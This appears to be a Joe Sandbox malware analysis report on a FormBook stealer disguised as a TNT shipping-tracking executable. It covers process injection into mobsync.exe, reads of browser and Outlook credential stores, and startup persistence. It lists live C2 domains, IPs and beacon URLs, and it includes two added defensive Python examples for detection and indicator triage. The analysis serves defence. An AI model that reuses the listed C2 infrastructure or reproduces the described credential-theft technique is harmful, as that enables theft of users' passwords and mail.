Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\mobsync.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: jailkeeper.exe | Binary or memory string: WIN_81
Source: jailkeeper.exe | Binary or memory string: WIN_XP
Source: jailkeeper.exe | Binary or memory string: WIN_XPe
Source: jailkeeper.exe | Binary or memory string: WIN_VISTA
Source: jailkeeper.exe | Binary or memory string: WIN_7
Source: jailkeeper.exe | Binary or memory string: WIN_8
Source: jailkeeper.exe.0.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
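Added detection example, not part of the Joe Sandbox report: the "File opened" and "Key opened" findings above are the stealer stage reading Chrome and Edge credential stores and the Outlook profile key from inside mobsync.exe, a signed Windows binary. The rule below encodes the only reliable signal in that list: each credential store has a short set of legitimate owner processes, and any other image opening it is an alert, with a second function counting how many distinct stores one image swept. The events are constructed from the report's own paths (trailing backslash on the registry key dropped); the store patterns, owner sets and the one benign Chrome event are my additions.

```python
"""Flag non-owner processes opening browser and mail credential stores.

Added example, not Joe Sandbox code. Events are (kind, process image, object
opened), modelled on the report's 'File opened' / 'Key opened' findings.
"""
import ntpath
import re
from collections import defaultdict

EVENTS = [
    ("file", r"C:\Windows\SysWOW64\mobsync.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"),
    ("file", r"C:\Windows\SysWOW64\mobsync.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    ("file", r"C:\Windows\SysWOW64\mobsync.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data"),
    ("file", r"C:\Windows\SysWOW64\mobsync.exe", r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    ("file", r"C:\Windows\SysWOW64\mobsync.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State"),
    ("registry", r"C:\Windows\SysWOW64\mobsync.exe", r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook"),
    # Constructed benign event (not from the report): the browser reading its own database.
    ("file", r"C:\Program Files\Google\Chrome\Application\chrome.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
]

# (store label, pattern on the opened object, images allowed to open it)
CREDENTIAL_STORES = [
    ("chrome-store", re.compile(r"\\Google\\Chrome\\User Data\\.*(Login Data|Cookies|Web Data|Local State)$", re.I), {"chrome.exe"}),
    ("edge-store", re.compile(r"\\Microsoft\\Edge\\User Data\\.*(Login Data|Cookies|Web Data|Local State)$", re.I), {"msedge.exe"}),
    ("outlook-profile", re.compile(r"\\Windows Messaging Subsystem\\Profiles(\\|$)", re.I), {"outlook.exe"}),
]


def classify(event):
    """Return (store label, allowed) for a credential-store access, (None, True) otherwise."""
    _kind, process, target = event
    image = ntpath.basename(process).lower()
    for label, rx, owners in CREDENTIAL_STORES:
        if rx.search(target):
            return label, image in owners
    return None, True


def credential_access_alerts(events):
    """{(image, store label): [objects opened]} for every non-owner access."""
    alerts = defaultdict(list)
    for event in events:
        label, allowed = classify(event)
        if label and not allowed:
            alerts[(ntpath.basename(event[1]).lower(), label)].append(event[2])
    return dict(alerts)


def stores_per_process(alerts):
    """Distinct stores each offending image touched. A stealer sweeps browsers
    and mail in one run; a misbehaving backup or sync agent usually hits one."""
    counts = defaultdict(int)
    for image, _store in alerts:
        counts[image] += 1
    return dict(counts)


if __name__ == "__main__":
    alerts = credential_access_alerts(EVENTS)
    for (image, store), objects in alerts.items():
        print(f"ALERT {image} opened {store}: {len(objects)} object(s)")
    print("stores per process:", stores_per_process(alerts))
```

Allowlisting by signer or by path would not help here: mobsync.exe is a Microsoft-signed binary in System32\SysWOW64 and is only the host the stealer was injected into. The conjunction (a process that is not the store's owner, touching several stores in one run) is what carries the detection, and it pairs naturally with the RWX-mapping finding from the previous section, where mobsync.exe appears as an injection target.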

                    Remote Access Functionality

Source: Yara match | File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.3370359960.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3370703283.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2674996160.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3369010830.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3371766946.0000000004A60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2680764092.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2686142507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3366041781.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2667870776.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00F36283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00F36283
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00F36747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00F36747
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe | Code function: 2_2_00236283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_00236283
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe | Code function: 2_2_00236747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00236747
MITRE ATT&CK Matrix, listed per tactic column. The number in brackets is the badge the report shows next to a technique; techniques without a number carry no badge in the report.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Scripting [111]; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts [2]; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Native API [2]; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: Scripting [111]; DLL Side-Loading [1]; Valid Accounts [2]; Registry Run Keys / Startup Folder [2]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: Exploitation for Privilege Escalation [1]; Abuse Elevation Control Mechanism [1]; DLL Side-Loading [1]; Valid Accounts [2]; Access Token Manipulation [21]; Process Injection [312]; Registry Run Keys / Startup Folder [2]; Scheduled Task/Job; At; Cron
Defense Evasion: Disable or Modify Tools [1]; Deobfuscate/Decode Files or Information [1]; Abuse Elevation Control Mechanism [1]; Obfuscated Files or Information [2]; DLL Side-Loading [1]; Masquerading [1]; Valid Accounts [2]; Virtualization/Sandbox Evasion [2]; Access Token Manipulation [21]; Process Injection [312]
Credential Access: OS Credential Dumping [1]; Input Capture [21]; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: System Time Discovery [2]; Account Discovery [1]; File and Directory Discovery [2]; System Information Discovery [117]; Security Software Discovery [251]; Virtualization/Sandbox Evasion [2]; Process Discovery [3]; Application Window Discovery [11]; System Owner/User Discovery [1]; Network Service Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: Archive Collected Data [1]; Data from Local System [1]; Email Collection [1]; Input Capture [21]; Clipboard Data [3]; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: Ingress Tool Transfer [4]; Encrypted Channel [1]; Non-Application Layer Protocol [4]; Application Layer Protocol [4]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot [1]; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph (ID: 1576937, Sample: TNT AWB TRACKING DETAILS.exe, Startdate: 17/12/2024, Architecture: WINDOWS, Score: 100), rendered as a process tree:

Start
  Network: www.medicaresbasics.xyz; www.meliorahomes.net; 5 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; Performs DNS queries to domains with low reputation (www.medicaresbasics.xyz); 6 other signatures
  +-- TNT AWB TRACKING DETAILS.exe (started)
  |     Dropped: C:\Users\user\AppData\...\jailkeeper.exe, PE32
  |     Signatures: Binary is likely a compiled AutoIt script file
  |     +-- jailkeeper.exe (started)
  |           Dropped: C:\Users\user\AppData\...\jailkeeper.vbs, data
  |           Signatures: Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; Machine Learning detection for dropped file; 2 other signatures
  |           +-- svchost.exe (started)
  |                 Signatures: Maps a DLL or memory area into another process
  |                 +-- bRQIkEscRm.exe (injected)
  |                       Network: www.martmall.info 209.74.64.189, 49976, 80, MULTIBAND-NEWHOPEUS, United States; www.meliorahomes.net 8.217.17.192, 49938, 49944, 49951, CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC, Singapore; arcare.partners 3.33.130.190, 49841, 49880, 49886, AMAZONEXPANSIONGB, United States
  |                       Signatures: Found direct / indirect Syscall (likely to bypass EDR)
  |                       +-- mobsync.exe (started)
  |                             Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
  |                             +-- firefox.exe (started)
  +-- wscript.exe (started)
        Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
        +-- jailkeeper.exe (started)
              Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
              +-- svchost.exe (started)

Antivirus, Machine Learning and Genetic Malware Detection (Source | Detection | Scanner | Label)
TNT AWB TRACKING DETAILS.exe | 58% | ReversingLabs | Win32.Trojan.Nymeria
TNT AWB TRACKING DETAILS.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\hurtling\jailkeeper.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\hurtling\jailkeeper.exe | 58% | ReversingLabs | Win32.Trojan.Nymeria
                    No Antivirus matches
                    No Antivirus matches
URL detection (Source | Detection | Scanner | Label)
http://www.martmall.info | 0% | Avira URL Cloud | safe
http://www.medicaresbasics.xyz/fm31/ | 0% | Avira URL Cloud | safe
http://www.martmall.info/mnch/ | 0% | Avira URL Cloud | safe
http://www.arcare.partners/0w45/?RDupG=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LSEn3qWTHIIMAUdJFcTrpTiN/JQeOvxH0Rgqs0rYow7etS27iW8=&wdw=m8AHs | 100% | Avira URL Cloud | malware
http://www.meliorahomes.net/ir1u/ | 0% | Avira URL Cloud | safe
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
medicaresbasics.xyz | 3.33.130.190 | true | true | none | unknown
arcare.partners | 3.33.130.190 | true | true | none | unknown
www.martmall.info | 209.74.64.189 | true | true | none | unknown
www.meliorahomes.net | 8.217.17.192 | true | true | none | unknown
www.resellnexa.shop | unknown | unknown | false | none | unknown
www.medicaresbasics.xyz | unknown | unknown | true | none | unknown
www.arcare.partners | unknown | unknown | false | none | unknown
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
http://www.martmall.info/mnch/ | true | Avira URL Cloud: safe | unknown
http://www.arcare.partners/0w45/?RDupG=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LSEn3qWTHIIMAUdJFcTrpTiN/JQeOvxH0Rgqs0rYow7etS27iW8=&wdw=m8AHs | true | Avira URL Cloud: malware | unknown
http://www.medicaresbasics.xyz/fm31/ | true | Avira URL Cloud: safe | unknown
http://www.meliorahomes.net/ir1u/ | true | Avira URL Cloud: safe | unknown
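Added IOC-triage example, not part of the Joe Sandbox report: the URL tables above carry a caveat worth automating. Three of the four URLs the sample contacted are rated "safe" by the URL reputation feed, yet all four share the same shape (a four-character path segment such as /mnch/ or /0w45/, the last one with a single long base64-looking query value and a short token). The code below applies that shape heuristic, which I derived from these four URLs, defangs the IOCs for a report, and lists where reputation and shape disagree. The URLs and Avira labels are the ones in the tables; the benign DuckDuckGo URL from the memory-strings table is the negative case.

```python
"""Shape-based triage of contacted URLs, with defanged output.

Added example, not Joe Sandbox code. The beacon-shape heuristic is mine, fitted
to the four URLs this report attributes to the sample; treat it as a hunting
filter, not as a definitive family classifier.
"""
import re
from urllib.parse import urlsplit

URL_VERDICTS = [  # (url, Avira URL Cloud label from the report; None = not rated)
    ("http://www.martmall.info/mnch/", "safe"),
    ("http://www.medicaresbasics.xyz/fm31/", "safe"),
    ("http://www.arcare.partners/0w45/?RDupG=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LSEn3qWTHIIMAUdJFcTrpTiN/JQeOvxH0Rgqs0rYow7etS27iW8=&wdw=m8AHs", "malware"),
    ("http://www.meliorahomes.net/ir1u/", "safe"),
    ("https://duckduckgo.com/chrome_newtab", None),
]

PATH_RX = re.compile(r"^/[a-z0-9]{4}/$", re.I)        # /mnch/, /fm31/, /0w45/, /ir1u/
B64_RX = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")     # long base64 blob, not URL-encoded
TOKEN_RX = re.compile(r"^[A-Za-z0-9]{1,16}$")          # short second parameter


def beacon_shape(url):
    """'check-in' for /xxxx/ alone, 'data-beacon' for /xxxx/?k=<b64>&k2=<token>, else None."""
    u = urlsplit(url)
    if not PATH_RX.match(u.path):
        return None
    if not u.query:
        return "check-in"
    pairs = [p.split("=", 1) for p in u.query.split("&")]
    if len(pairs) == 2 and all(len(p) == 2 for p in pairs):
        (_k1, blob), (_k2, token) = pairs
        if B64_RX.match(blob) and TOKEN_RX.match(token):
            return "data-beacon"
    return None


def defang(url):
    """hxxp://www[.]example[.]tld/... so the IOC cannot be followed by accident."""
    u = urlsplit(url)
    host = u.hostname.replace(".", "[.]")
    rest = u.path + (f"?{u.query}" if u.query else "")
    return f"{u.scheme.replace('http', 'hxxp')}://{host}{rest}"


def triage(url_verdicts):
    """One row per URL: defanged IOC, host, shape verdict, feed verdict, suspicious flag."""
    rows = []
    for url, verdict in url_verdicts:
        shape = beacon_shape(url)
        rows.append({"ioc": defang(url), "host": urlsplit(url).hostname, "shape": shape,
                     "av_verdict": verdict, "suspicious": shape is not None})
    return rows


def reputation_misses(rows):
    """Defanged URLs whose shape says beacon while the reputation feed says safe."""
    return [r["ioc"] for r in rows if r["suspicious"] and r["av_verdict"] == "safe"]


if __name__ == "__main__":
    rows = triage(URL_VERDICTS)
    for r in rows:
        print(f"{r['ioc']}  shape={r['shape']}  feed={r['av_verdict']}")
    print("rated safe but beacon-shaped:", len(reputation_misses(rows)))
```

The lesson the tables teach is that a URL reputation verdict on a freshly registered C2 host says nothing; the attribution comes from the sandbox (the Yara matches and the injection chain), and the URL shape plus the host list is what goes into the block list and the hunt query.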
URLs from memory strings (Name | Source | Malicious | Antivirus Detection | Reputation)
https://ac.ecosia.org/autocomplete?q= | mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmp | false | none | high
https://duckduckgo.com/chrome_newtab | mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmp | false | none | high
http://www.martmall.info | bRQIkEscRm.exe, 00000009.00000002.3369010830.0000000000FB2000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmp | false | none | high
https://ch.search.yahoo.com/favicon.ico https://ch.search.yahoo.com/search | mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmp | false | none | high
https://duckduckgo.com/favicon.ico https://duckduckgo.com/?q= | mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmp | false | none | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmp | false | none | high
https://www.ecosia.org/newtab/ | mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmp | false | none | high
https://cdn.ecosia.org/assets/images/ico/favicon.ico https://www.ecosia.org/search?q= | mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmp | false | none | high
IP | Domain | Country | ASN | ASN Name | Malicious
8.217.17.192 | www.meliorahomes.net | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true
209.74.64.189 | www.martmall.info | United States | 31744 | MULTIBAND-NEWHOPEUS | true
3.33.130.190 | medicaresbasics.xyz | United States | 8987 | AMAZONEXPANSIONGB | true
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1576937
                                                  Start date and time:2024-12-17 18:37:06 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 8m 53s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:12
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:1
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:TNT AWB TRACKING DETAILS.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.expl.evad.winEXE@14/11@5/3
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:
                                                  • Successful, ratio: 99%
                                                  • Number of executed functions: 56
                                                  • Number of non-executed functions: 277
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • VT rate limit hit for: TNT AWB TRACKING DETAILS.exe
Time | Type | Description
12:39:30 | API Interceptor | 258965x Sleep call for process: mobsync.exe modified
18:38:02 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
8.217.17.192 | TNT AWB TRACKING DETAILS.exe | malicious | FormBook | www.meliorahomes.net/ir1u/
8.217.17.192 | H1CYDJ8LQe.exe | malicious | FormBook | www.meliorahomes.net/y4rz/
8.217.17.192 | z1SupplyInvoiceCM60916_Doc.exe | malicious | FormBook | www.meliorahomes.net/x0tl/
8.217.17.192 | shipping documents_pdf.exe | malicious | FormBook | www.meliorahomes.net/v6hi/
209.74.64.189 | 3NvALxFlHV.exe | malicious | FormBook | www.martmall.info/mnch/
209.74.64.189 | 2ULrUoVwTx.exe | malicious | FormBook, GuLoader | www.guvosh.info/weoa/?zF=oJ3h&TZe=EoFNcPjpgMXDCm2Fqpv9chcO//vCOK6+pKCezFiYD4jbj2Yo7D13E7NcxzwFrISbrXGSJXEIolRF+rdzKXlRzj47a3cr9e8k2bIQ5hr8OKJvNKG0Ug==
209.74.64.189 | mBms4I508x.exe | malicious | FormBook | www.maltad.pro/uhoh/
209.74.64.189 | Viridine84.exe | malicious | FormBook, GuLoader | www.solfhub.top/vhow/
209.74.64.189 | COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe | malicious | FormBook | www.martmall.info/mnch/
209.74.64.189 | General terms and conditions of sale - Valid from 10202024 to 12312024.exe | malicious | FormBook | www.telsems.xyz/cw5u/?jB=imLActLk+x2xsx1GEJF5DZHHpQpyGPLFP82EGniwrEQwdS7fFfqL4LZhs1ZgZ7V75hZVb3KEINx2ZFSt81lTbT4CT7bnoLOJ9N6wdLppJljwAE6YNQ==&ldz=rxiD0VSh
209.74.64.189 | Request for 30 Downpayment.exe | malicious | FormBook, PureLog Stealer | www.unbuys.online/nzii/
209.74.64.189 | Tandemmernes90.exe | malicious | FormBook, GuLoader | www.martmall.info/o60r/
209.74.64.189 | rpedido-002297.exe | malicious | FormBook, GuLoader | www.guvosh.info/weoa/
3.33.130.190 | 236236236.elf | malicious | Unknown | lojasdinastia.com.br/
3.33.130.190 | TNT AWB TRACKING DETAILS.exe | malicious | FormBook | www.medicaresbasics.xyz/fm31/
3.33.130.190 | profroma invoice.exe | malicious | FormBook | www.iglpg.online/rbqc/
3.33.130.190 | SC_TR11670000_pdf.exe | malicious | FormBook | www.tdassetmgt.info/d55l/
3.33.130.190 | goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta | malicious | Cobalt Strike, FormBook | www.deikamalaharris.info/lrgf/
3.33.130.190 | ORDER-401.exe | malicious | FormBook | www.likesharecomment.net/nqht/
3.33.130.190 | Nieuwebestellingen10122024.exe | malicious | FormBook | www.cbprecise.online/cvmn/
3.33.130.190 | Outstanding Invoices Spreadsheet Scan 00495_PDF.exe | malicious | FormBook | www.binacamasala.com/gnm5/
3.33.130.190 | PO2412010.exe | malicious | FormBook | www.goldstarfootwear.shop/8m07/
3.33.130.190 | Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe | malicious | FormBook | www.emirates-visa.net/6wmy/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.meliorahomes.net | TNT AWB TRACKING DETAILS.exe | malicious | FormBook | 8.217.17.192
www.meliorahomes.net | H1CYDJ8LQe.exe | malicious | FormBook | 8.217.17.192
www.meliorahomes.net | rInvoiceCM60916_xlx.exe | malicious | FormBook | 8.217.17.192
www.meliorahomes.net | z1SupplyInvoiceCM60916_Doc.exe | malicious | FormBook | 8.217.17.192
www.meliorahomes.net | shipping documents_pdf.exe | malicious | FormBook | 8.217.17.192
www.martmall.info | 3NvALxFlHV.exe | malicious | FormBook | 209.74.64.189
www.martmall.info | COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe | malicious | FormBook | 209.74.64.189
www.martmall.info | Tandemmernes90.exe | malicious | FormBook, GuLoader | 209.74.64.189
Match | Associated Sample Name / URL | Detection | Threat Name | Context
MULTIBAND-NEWHOPEUS | z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe | malicious | FormBook | 209.74.79.41
MULTIBAND-NEWHOPEUS | ORDER - 401.exe | malicious | FormBook | 209.74.77.107
MULTIBAND-NEWHOPEUS | SC_TR11670000_pdf.exe | malicious | FormBook | 209.74.64.58
MULTIBAND-NEWHOPEUS | PO 1202495088.exe | malicious | FormBook | 209.74.79.40
MULTIBAND-NEWHOPEUS | ORDER-401.exe | malicious | FormBook | 209.74.77.107
MULTIBAND-NEWHOPEUS | Rockwool-Msg-S9039587897.pdf | malicious | EvilProxy, HTMLPhisher | 209.74.95.101
MULTIBAND-NEWHOPEUS | SHIPPING DOCUMENTS_PDF.exe | malicious | FormBook | 209.74.79.42
MULTIBAND-NEWHOPEUS | Nieuwebestellingen10122024.exe | malicious | FormBook | 209.74.64.187
MULTIBAND-NEWHOPEUS | CJE003889.exe | malicious | FormBook | 209.74.79.40
MULTIBAND-NEWHOPEUS | ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | malicious | FormBook | 209.74.79.41
AMAZONEXPANSIONGB | https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9jSUEudm9taXZvci5ydS9Td1dIay8=/%23dGVzbGFAdGVzbGEuY29t | malicious | Unknown | 3.33.220.150
AMAZONEXPANSIONGB | https://alluc.co/watch-movies/passengers.html | malicious | Unknown | 52.223.40.198
AMAZONEXPANSIONGB | setup.msi | malicious | AteraAgent | 52.223.39.232
AMAZONEXPANSIONGB | ij4YvAl59D.exe | malicious | RisePro Stealer | 3.36.173.8
AMAZONEXPANSIONGB | z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe | malicious | FormBook | 52.223.13.41
AMAZONEXPANSIONGB | https://dot.itsecuritymessages.com/45sf4657dvz4hn/afc6c7/00179cbf-581d-4c00-98d3-bf1104b204ad | malicious | Unknown | 15.200.58.134
AMAZONEXPANSIONGB | 236236236.elf | malicious | Unknown | 3.33.130.190
AMAZONEXPANSIONGB | http://898.tv/Lantekqs | malicious | Unknown | 52.223.21.92
AMAZONEXPANSIONGB | TNT AWB TRACKING DETAILS.exe | malicious | FormBook | 3.33.130.190
AMAZONEXPANSIONGB | sh4.nn.elf | malicious | Mirai, Okiru | 3.38.180.241
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | https://sos-at-vie-1.exo.io/ilbuck/sato/process/continue-after-check-vr2.html | malicious | CAPTCHA Scam ClickFix | 149.129.200.32
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | 236236236.elf | malicious | Unknown | 8.222.255.113
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | https://www.sendspace.com/pro/dl/m2hhc1 | malicious | Unknown | 147.139.142.100
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | https://www.sendspace.com/pro/dl/m2hhc1 | malicious | Unknown | 147.139.142.100
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | arm5.elf | malicious | Mirai | 8.217.36.232
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | x86.elf | malicious | Mirai | 8.218.63.155
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | TNT AWB TRACKING DETAILS.exe | malicious | FormBook | 8.217.17.192
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | sh4.elf | malicious | Unknown | 47.245.134.49
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | spc.elf | malicious | Unknown | 8.221.71.12
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | ppc.elf | malicious | Unknown | 47.241.21.57
                                                  No context
                                                  No context
                                                  Process:C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):287744
                                                  Entropy (8bit):7.995904256257025
                                                  Encrypted:true
